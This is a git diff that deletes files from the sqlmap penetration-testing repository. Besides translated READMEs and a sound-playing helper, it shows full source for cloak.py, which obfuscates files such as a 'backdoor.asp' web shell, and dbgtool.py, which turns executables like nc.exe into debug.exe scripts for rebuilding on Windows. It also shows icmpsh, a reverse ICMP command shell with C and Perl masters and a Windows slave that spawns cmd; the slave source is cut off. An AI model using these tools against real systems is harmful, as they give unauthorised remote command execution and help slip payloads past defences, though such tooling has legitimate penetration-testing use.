[@sqlmap](https://twitter.com/sqlmap) -* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos) -* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-tr-TR.md b/doc/translations/README-tr-TR.md deleted file mode 100644 index d6b9cbc9..00000000 --- a/doc/translations/README-tr-TR.md +++ /dev/null @@ -1,56 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap geliÅŸmiÅŸ tespit özelliÄŸinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine eriÅŸmek, dosya çalıştırmak gibi - iÅŸlevleri de barındırmaktadır. - - -Ekran görüntüleri ----- - -![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - - -İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz. - - -Kurulum ----- - -[Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipbal'ı indirebilirsiniz. - -Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6.x** and **2.7.x** versiyonları ile bütün platformlarda çalışabilmektedir. - -Kullanım ----- - - -Bütün basit seçeneklerin listesini gösterir - - python sqlmap.py -h - -Bütün seçenekleri gösterir - - python sqlmap.py -hh - -Program ile ilgili örnekleri [burada](https://gist.github.com/stamparm/5335217) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduÄŸu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki) bakmanızı tavsiye ediyoruz - -Links ----- - -* Anasayfa: http://sqlmap.org -* İndirme baÄŸlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues -* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki -* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mail listesi: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mail RSS takibi: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mail listesi arÅŸivi: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-zh-CN.md b/doc/translations/README-zh-CN.md deleted file mode 100644 index 6aea35f7..00000000 --- a/doc/translations/README-zh-CN.md +++ /dev/null @@ -1,52 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap 是一个开æºçš„æ¸—逿µ‹è¯•工具,å¯ä»¥ç”¨æ¥è‡ªåŠ¨åŒ–çš„æ£€æµ‹ï¼Œåˆ©ç”¨SQLæ³¨å…¥æ¼æ´žï¼ŒèŽ·å–æ•°æ®åº“æœåŠ¡å™¨çš„æƒé™ã€‚它具有功能强大的检测引擎,针对å„ç§ä¸åŒç±»åž‹æ•°æ®åº“çš„æ¸—é€æµ‹è¯•çš„åŠŸèƒ½é€‰é¡¹ï¼ŒåŒ…æ‹¬èŽ·å–æ•°æ®åº“中存储的数æ®ï¼Œè®¿é—®æ“作系统文件甚至å¯ä»¥é€šè¿‡å¤–带数æ®è¿žæŽ¥çš„æ–¹å¼æ‰§è¡Œæ“作系统命令。 - -演示截图 ----- - -![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -ä½ å¯ä»¥è®¿é—® wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看å„ç§ç”¨æ³•的演示 - -安装方法 ----- - -ä½ å¯ä»¥ç‚¹å‡» [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的æºä»£ç  或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的æºä»£ç . - -推è你从 [Git](https://github.com/sqlmapproject/sqlmap) ä»“åº“èŽ·å–æœ€æ–°çš„æºä»£ç : - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap å¯ä»¥è¿è¡Œåœ¨ [Python](http://www.python.org/download/) **2.6.x** å’Œ **2.7.x** 版本的任何平å°ä¸Š - -使用方法 ----- - -通过如下命令å¯ä»¥æŸ¥çœ‹åŸºæœ¬çš„用法åŠå‘½ä»¤è¡Œå‚æ•°: - - python sqlmap.py -h - -通过如下的命令å¯ä»¥æŸ¥çœ‹æ‰€æœ‰çš„用法åŠå‘½ä»¤è¡Œå‚æ•°: - - python sqlmap.py -hh - -ä½ å¯ä»¥ä»Ž [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外,你还å¯ä»¥æŸ¥çœ‹ [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获å–sqlmap所有支æŒçš„特性ã€å‚æ•°ã€å‘½ä»¤è¡Œé€‰é¡¹å¼€å…³åŠè¯´æ˜Žçš„使用帮助。 - -链接 ----- - -* 项目主页: http://sqlmap.org -* æºä»£ç ä¸‹è½½: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues -* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki -* 常è§é—®é¢˜ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/extra/__init__.py b/extra/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/beep/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/beep/beep.py b/extra/beep/beep.py deleted file mode 100644 index 48ba4352..00000000 --- a/extra/beep/beep.py +++ /dev/null @@ -1,96 +0,0 @@ -#!/usr/bin/env python - -""" -beep.py - Make a beep sound - -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import subprocess -import sys -import wave - -BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav") - -def beep(): - try: - if subprocess.mswindows: - _win_wav_play(BEEP_WAV_FILENAME) - elif sys.platform == "darwin": - _mac_beep() - elif sys.platform == "linux2": - _linux_wav_play(BEEP_WAV_FILENAME) - else: - _speaker_beep() - except: - _speaker_beep() - -def _speaker_beep(): - sys.stdout.write('\a') # doesn't work on modern Linux systems - - try: - sys.stdout.flush() - except IOError: - pass - -def _mac_beep(): - import Carbon.Snd - Carbon.Snd.SysBeep(1) - -def _win_wav_play(filename): - import winsound - - winsound.PlaySound(filename, winsound.SND_FILENAME) - -def _linux_wav_play(filename): - for _ in ("aplay", "paplay", "play"): - if not os.system("%s '%s' 2>/dev/null" % (_, filename)): - return - - import ctypes - - PA_STREAM_PLAYBACK = 1 - PA_SAMPLE_S16LE = 3 - BUFFSIZE = 1024 - - class struct_pa_sample_spec(ctypes.Structure): - _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)] - - pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0") - - wave_file = wave.open(filename, "rb") - - pa_sample_spec = struct_pa_sample_spec() - pa_sample_spec.rate = wave_file.getframerate() - pa_sample_spec.channels = wave_file.getnchannels() - pa_sample_spec.format = PA_SAMPLE_S16LE - - error = ctypes.c_int(0) - - pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error)) - if not pa_stream: - raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error))) - - while True: - latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error)) - if latency == -1: - raise Exception("Getting latency failed") - - buf = wave_file.readframes(BUFFSIZE) - if not buf: - break - - if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)): - raise Exception("Could not play file") - - wave_file.close() - - if pa.pa_simple_drain(pa_stream, ctypes.byref(error)): - raise Exception("Could not simple drain") - - pa.pa_simple_free(pa_stream) - -if __name__ == "__main__": - beep() diff --git a/extra/beep/beep.wav b/extra/beep/beep.wav deleted file mode 100644 index 35903d8a..00000000 Binary files a/extra/beep/beep.wav and /dev/null differ diff --git a/extra/cloak/README.txt b/extra/cloak/README.txt deleted file mode 100644 index 7743ff08..00000000 --- a/extra/cloak/README.txt +++ /dev/null @@ -1,22 +0,0 @@ -To use cloak.py you need to pass it the original file, -and optionally the output file name. - -Example: - -$ python ./cloak.py -i backdoor.asp -o backdoor.asp_ - -This will create an encrypted and compressed binary file backdoor.asp_. - -Such file can then be converted to its original form by using the -d -functionality of the cloak.py program: - -$ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp - -If you skip the output file name, general rule is that the compressed -file names are suffixed with the character '_', while the original is -get by skipping the last character. So, that means that the upper -examples can also be written in the following form: - -$ python ./cloak.py -i backdoor.asp - -$ python ./cloak.py -d -i backdoor.asp_ diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/cloak/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py deleted file mode 100755 index 3137fe9b..00000000 --- a/extra/cloak/cloak.py +++ /dev/null @@ -1,85 +0,0 @@ -#!/usr/bin/env python - -""" -cloak.py - Simple file encryption/compression utility - -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import sys -import zlib - -from optparse import OptionError -from optparse import OptionParser - -def hideAscii(data): - retVal = "" - for i in xrange(len(data)): - if ord(data[i]) < 128: - retVal += chr(ord(data[i]) ^ 127) - else: - retVal += data[i] - - return retVal - -def cloak(inputFile=None, data=None): - if data is None: - with open(inputFile, "rb") as f: - data = f.read() - - return hideAscii(zlib.compress(data)) - -def decloak(inputFile=None, data=None): - if data is None: - with open(inputFile, "rb") as f: - data = f.read() - try: - data = zlib.decompress(hideAscii(data)) - except: - print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile - sys.exit(1) - finally: - f.close() - - return data - -def main(): - usage = '%s [-d] -i [-o ]' % sys.argv[0] - parser = OptionParser(usage=usage, version='0.1') - - try: - parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt') - parser.add_option('-i', dest='inputFile', help='Input file') - parser.add_option('-o', dest='outputFile', help='Output file') - - (args, _) = parser.parse_args() - - if not args.inputFile: - parser.error('Missing the input file, -h for help') - - except (OptionError, TypeError), e: - parser.error(e) - - if not os.path.isfile(args.inputFile): - print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile - sys.exit(1) - - if not args.decrypt: - data = cloak(args.inputFile) - else: - data = decloak(args.inputFile) - - if not args.outputFile: - if not args.decrypt: - args.outputFile = args.inputFile + '_' - else: - args.outputFile = args.inputFile[:-1] - - f = open(args.outputFile, 'wb') - f.write(data) - f.close() - -if __name__ == '__main__': - main() diff --git a/extra/dbgtool/README.txt b/extra/dbgtool/README.txt deleted file mode 100644 index fa55859a..00000000 --- a/extra/dbgtool/README.txt +++ /dev/null @@ -1,20 +0,0 @@ -To use dbgtool.py you need to pass it the MS-DOS executable binary file, -and optionally the output debug.exe script file name. - -Example: - -$ python ./dbgtool.py -i ./nc.exe -o nc.scr - -This will create a ASCII text file with CRLF line terminators called -nc.scr. - -Such file can then be converted to its original portable executable with -the Windows native debug.exe, that is installed by default in all Windows -systems: - -> debug.exe < nc.scr - -To be able to execute it on Windows you have to rename it to end with -'.com' or '.exe': - -> ren nc_exe nc.exe diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/dbgtool/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py deleted file mode 100644 index fd697e81..00000000 --- a/extra/dbgtool/dbgtool.py +++ /dev/null @@ -1,95 +0,0 @@ -#!/usr/bin/env python - -""" -dbgtool.py - Portable executable to ASCII debug script converter - -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import sys -import struct - -from optparse import OptionError -from optparse import OptionParser - -def convert(inputFile): - fileStat = os.stat(inputFile) - fileSize = fileStat.st_size - - if fileSize > 65280: - print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile - sys.exit(1) - - script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) - script += "%x\nf 0100 ffff 00\n" % fileSize - scrString = "" - counter = 256 - counter2 = 0 - - fp = open(inputFile, "rb") - fileContent = fp.read() - - for fileChar in fileContent: - unsignedFileChar = struct.unpack("B", fileChar)[0] - - if unsignedFileChar != 0: - counter2 += 1 - - if not scrString: - scrString = "e %0x %02x" % (counter, unsignedFileChar) - else: - scrString += " %02x" % unsignedFileChar - elif scrString: - script += "%s\n" % scrString - scrString = "" - counter2 = 0 - - counter += 1 - - if counter2 == 20: - script += "%s\n" % scrString - scrString = "" - counter2 = 0 - - script += "w\nq\n" - - return script - -def main(inputFile, outputFile): - if not os.path.isfile(inputFile): - print "ERROR: the provided input file '%s' is not a regular file" % inputFile - sys.exit(1) - - script = convert(inputFile) - - if outputFile: - fpOut = open(outputFile, "w") - sys.stdout = fpOut - sys.stdout.write(script) - sys.stdout.close() - else: - print script - -if __name__ == "__main__": - usage = "%s -i [-o ]" % sys.argv[0] - parser = OptionParser(usage=usage, version="0.1") - - try: - parser.add_option("-i", dest="inputFile", help="Input binary file") - - parser.add_option("-o", dest="outputFile", help="Output debug.exe text file") - - (args, _) = parser.parse_args() - - if not args.inputFile: - parser.error("Missing the input file, -h for help") - - except (OptionError, TypeError), e: - parser.error(e) - - inputFile = args.inputFile - outputFile = args.outputFile - - main(inputFile, outputFile) diff --git a/extra/icmpsh/README.txt b/extra/icmpsh/README.txt deleted file mode 100644 index 631f9ee3..00000000 --- a/extra/icmpsh/README.txt +++ /dev/null @@ -1,45 +0,0 @@ -icmpsh - simple reverse ICMP shell - -icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl. - - ---- Running the Master --- - -The master is straight forward to use. There are no extra libraries required for the C version. -The Perl master however has the following dependencies: - - * IO::Socket - * NetPacket::IP - * NetPacket::ICMP - - -When running the master, don't forget to disable ICMP replies by the OS. For example: - - sysctl -w net.ipv4.icmp_echo_ignore_all=1 - -If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive -commands send from the master. - - ---- Running the Slave --- - -The slave comes with a few command line options as outlined below: - - --t host host ip address to send ping requests to. This option is mandatory! - --r send a single test icmp request containing the string "Test1234" and then quit. - This is for testing the connection. - --d milliseconds delay between requests in milliseconds - --o milliseconds timeout of responses in milliseconds. If a response has not received in time, - the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. - The counter is set back to 0 if a response was received. - --b num limit of blanks (unanswered icmp requests before quitting - --s bytes maximal data buffer size in bytes - - -In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer. diff --git a/extra/icmpsh/__init__.py b/extra/icmpsh/__init__.py deleted file mode 100644 index 1e340fa5..00000000 --- a/extra/icmpsh/__init__.py +++ /dev/null @@ -1,22 +0,0 @@ -#!/usr/bin/env python -# -# icmpsh - simple icmp command shell (port of icmpsh-m.pl written in -# Perl by Nico Leidecker ) -# -# Copyright (c) 2010, Bernardo Damele A. G. -# -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . - -pass diff --git a/extra/icmpsh/icmpsh-m.c b/extra/icmpsh/icmpsh-m.c deleted file mode 100644 index 32c3edb7..00000000 --- a/extra/icmpsh/icmpsh-m.c +++ /dev/null @@ -1,134 +0,0 @@ -/* - * icmpsh - simple icmp command shell - * Copyright (c) 2010, Nico Leidecker - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define IN_BUF_SIZE 1024 -#define OUT_BUF_SIZE 64 - -// calculate checksum -unsigned short checksum(unsigned short *ptr, int nbytes) -{ - unsigned long sum; - unsigned short oddbyte, rs; - - sum = 0; - while(nbytes > 1) { - sum += *ptr++; - nbytes -= 2; - } - - if(nbytes == 1) { - oddbyte = 0; - *((unsigned char *) &oddbyte) = *(u_char *)ptr; - sum += oddbyte; - } - - sum = (sum >> 16) + (sum & 0xffff); - sum += (sum >> 16); - rs = ~sum; - return rs; -} - -int main(int argc, char **argv) -{ - int sockfd; - int flags; - char in_buf[IN_BUF_SIZE]; - char out_buf[OUT_BUF_SIZE]; - unsigned int out_size; - int nbytes; - struct iphdr *ip; - struct icmphdr *icmp; - char *data; - struct sockaddr_in addr; - - - printf("icmpsh - master\n"); - - // create raw ICMP socket - sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); - if (sockfd == -1) { - perror("socket"); - return -1; - } - - // set stdin to non-blocking - flags = fcntl(0, F_GETFL, 0); - flags |= O_NONBLOCK; - fcntl(0, F_SETFL, flags); - - printf("running...\n"); - while(1) { - - // read data from socket - memset(in_buf, 0x00, IN_BUF_SIZE); - nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1); - if (nbytes > 0) { - // get ip and icmp header and data part - ip = (struct iphdr *) in_buf; - if (nbytes > sizeof(struct iphdr)) { - nbytes -= sizeof(struct iphdr); - icmp = (struct icmphdr *) (ip + 1); - if (nbytes > sizeof(struct icmphdr)) { - nbytes -= sizeof(struct icmphdr); - data = (char *) (icmp + 1); - data[nbytes] = '\0'; - printf("%s", data); - fflush(stdout); - } - - // reuse headers - icmp->type = 0; - addr.sin_family = AF_INET; - addr.sin_addr.s_addr = ip->saddr; - - // read data from stdin - nbytes = read(0, out_buf, OUT_BUF_SIZE); - if (nbytes > -1) { - memcpy((char *) (icmp + 1), out_buf, nbytes); - out_size = nbytes; - } else { - out_size = 0; - } - - icmp->checksum = 0x00; - icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size); - - // send reply - nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr)); - if (nbytes == -1) { - perror("sendto"); - return -1; - } - } - } - } - - return 0; -} - diff --git a/extra/icmpsh/icmpsh-m.pl b/extra/icmpsh/icmpsh-m.pl deleted file mode 100755 index 5a40b34f..00000000 --- a/extra/icmpsh/icmpsh-m.pl +++ /dev/null @@ -1,62 +0,0 @@ -#!/usr/bin/env perl -# -# icmpsh - simple icmp command shell -# Copyright (c) 2010, Nico Leidecker -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -# - - - -use strict; -use IO::Socket; -use NetPacket::IP; -use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO); -use Net::RawIP; -use Fcntl; - -print "icmpsh - master\n"; - -# create raw socket -my $sock = IO::Socket::INET->new( - Proto => "ICMP", - Type => SOCK_RAW, - Blocking => 1) or die "$!"; - -# set stdin to non-blocking -fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!"; - -print "running...\n"; - -my $input = ''; -while(1) { - if ($sock->recv(my $buffer, 4096, 0)) { - my $ip = NetPacket::IP->decode($buffer); - my $icmp = NetPacket::ICMP->decode($ip->{data}); - if ($icmp->{type} == ICMP_ECHO) { - # get identifier and sequencenumber - my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data}); - - # write data to stdout and read from stdin - print $data; - $input = ; - - # compile and send response - $icmp->{type} = ICMP_ECHOREPLY; - $icmp->{data} = pack("SSa*", $ident, $seq, $input); - my $raw = $icmp->encode(); - my $addr = sockaddr_in(0, inet_aton($ip->{src_ip})); - $sock->send($raw, 0, $addr) or die "$!\n"; - } - } -} diff --git a/extra/icmpsh/icmpsh-s.c b/extra/icmpsh/icmpsh-s.c deleted file mode 100644 index 5c127d84..00000000 --- a/extra/icmpsh/icmpsh-s.c +++ /dev/null @@ -1,346 +0,0 @@ -/* - * icmpsh - simple icmp command shell - * Copyright (c) 2010, Nico Leidecker - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - */ - - -#include -#include -#include -#include -#include -#include - -#define ICMP_HEADERS_SIZE (sizeof(ICMP_ECHO_REPLY) + 8) - -#define STATUS_OK 0 -#define STATUS_SINGLE 1 -#define STATUS_PROCESS_NOT_CREATED 2 - -#define TRANSFER_SUCCESS 1 -#define TRANSFER_FAILURE 0 - -#define DEFAULT_TIMEOUT 3000 -#define DEFAULT_DELAY 200 -#define DEFAULT_MAX_BLANKS 10 -#define DEFAULT_MAX_DATA_SIZE 64 - -FARPROC icmp_create, icmp_send, to_ip; - -int verbose = 0; - -int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write) -{ - SECURITY_ATTRIBUTES sattr; - STARTUPINFOA si; - HANDLE in_read, out_write; - - memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES)); - memset(pi, 0x00, sizeof(PROCESS_INFORMATION)); - - // create communication pipes - memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES)); - sattr.nLength = sizeof(SECURITY_ATTRIBUTES); - sattr.bInheritHandle = TRUE; - sattr.lpSecurityDescriptor = NULL; - - if (!CreatePipe(out_read, &out_write, &sattr, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - - if (!CreatePipe(&in_read, in_write, &sattr, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - - // spawn process - memset(&si, 0x00, sizeof(STARTUPINFO)); - si.cb = sizeof(STARTUPINFO); - si.hStdError = out_write; - si.hStdOutput = out_write; - si.hStdInput = in_read; - si.dwFlags |= STARTF_USESTDHANDLES; - - if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) { - return STATUS_PROCESS_NOT_CREATED; - } - - CloseHandle(out_write); - CloseHandle(in_read); - - return STATUS_OK; -} - -void usage(char *path) -{ - printf("%s [options] -t target\n", path); - printf("options:\n"); - printf(" -t host host ip address to send ping requests to\n"); - printf(" -r send a single test icmp request and then quit\n"); - printf(" -d milliseconds delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY); - printf(" -o milliseconds timeout in milliseconds\n"); - printf(" -h this screen\n"); - printf(" -b num maximal number of blanks (unanswered icmp requests)\n"); - printf(" before quitting\n"); - printf(" -s bytes maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE); - printf("In order to improve the speed, lower the delay (-d) between requests or\n"); - printf("increase the size (-s) of the data buffer\n"); -} - -void create_icmp_channel(HANDLE *icmp_chan) -{ - // create icmp file - *icmp_chan = (HANDLE) icmp_create(); -} - -int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout) -{ - int rs; - char *temp_in_buf; - int nbytes; - - PICMP_ECHO_REPLY echo_reply; - - temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE); - if (!temp_in_buf) { - return TRANSFER_FAILURE; - } - - // send data to remote host - rs = icmp_send( - icmp_chan, - target, - out_buf, - out_buf_size, - NULL, - temp_in_buf, - max_in_data_size + ICMP_HEADERS_SIZE, - timeout); - - // check received data - if (rs > 0) { - echo_reply = (PICMP_ECHO_REPLY) temp_in_buf; - if (echo_reply->DataSize > max_in_data_size) { - nbytes = max_in_data_size; - } else { - nbytes = echo_reply->DataSize; - } - memcpy(in_buf, echo_reply->Data, nbytes); - *in_buf_size = nbytes; - - free(temp_in_buf); - return TRANSFER_SUCCESS; - } - - free(temp_in_buf); - - return TRANSFER_FAILURE; -} - -int load_deps() -{ - HMODULE lib; - - lib = LoadLibraryA("ws2_32.dll"); - if (lib != NULL) { - to_ip = GetProcAddress(lib, "inet_addr"); - if (!to_ip) { - return 0; - } - } - - lib = LoadLibraryA("iphlpapi.dll"); - if (lib != NULL) { - icmp_create = GetProcAddress(lib, "IcmpCreateFile"); - icmp_send = GetProcAddress(lib, "IcmpSendEcho"); - if (icmp_create && icmp_send) { - return 1; - } - } - - lib = LoadLibraryA("ICMP.DLL"); - if (lib != NULL) { - icmp_create = GetProcAddress(lib, "IcmpCreateFile"); - icmp_send = GetProcAddress(lib, "IcmpSendEcho"); - if (icmp_create && icmp_send) { - return 1; - } - } - - printf("failed to load functions (%u)", GetLastError()); - - return 0; -} -int main(int argc, char **argv) -{ - int opt; - char *target; - unsigned int delay, timeout; - unsigned int ip_addr; - HANDLE pipe_read, pipe_write; - HANDLE icmp_chan; - unsigned char *in_buf, *out_buf; - unsigned int in_buf_size, out_buf_size; - DWORD rs; - int blanks, max_blanks; - PROCESS_INFORMATION pi; - int status; - unsigned int max_data_size; - struct hostent *he; - - - // set defaults - target = 0; - timeout = DEFAULT_TIMEOUT; - delay = DEFAULT_DELAY; - max_blanks = DEFAULT_MAX_BLANKS; - max_data_size = DEFAULT_MAX_DATA_SIZE; - - status = STATUS_OK; - if (!load_deps()) { - printf("failed to load ICMP library\n"); - return -1; - } 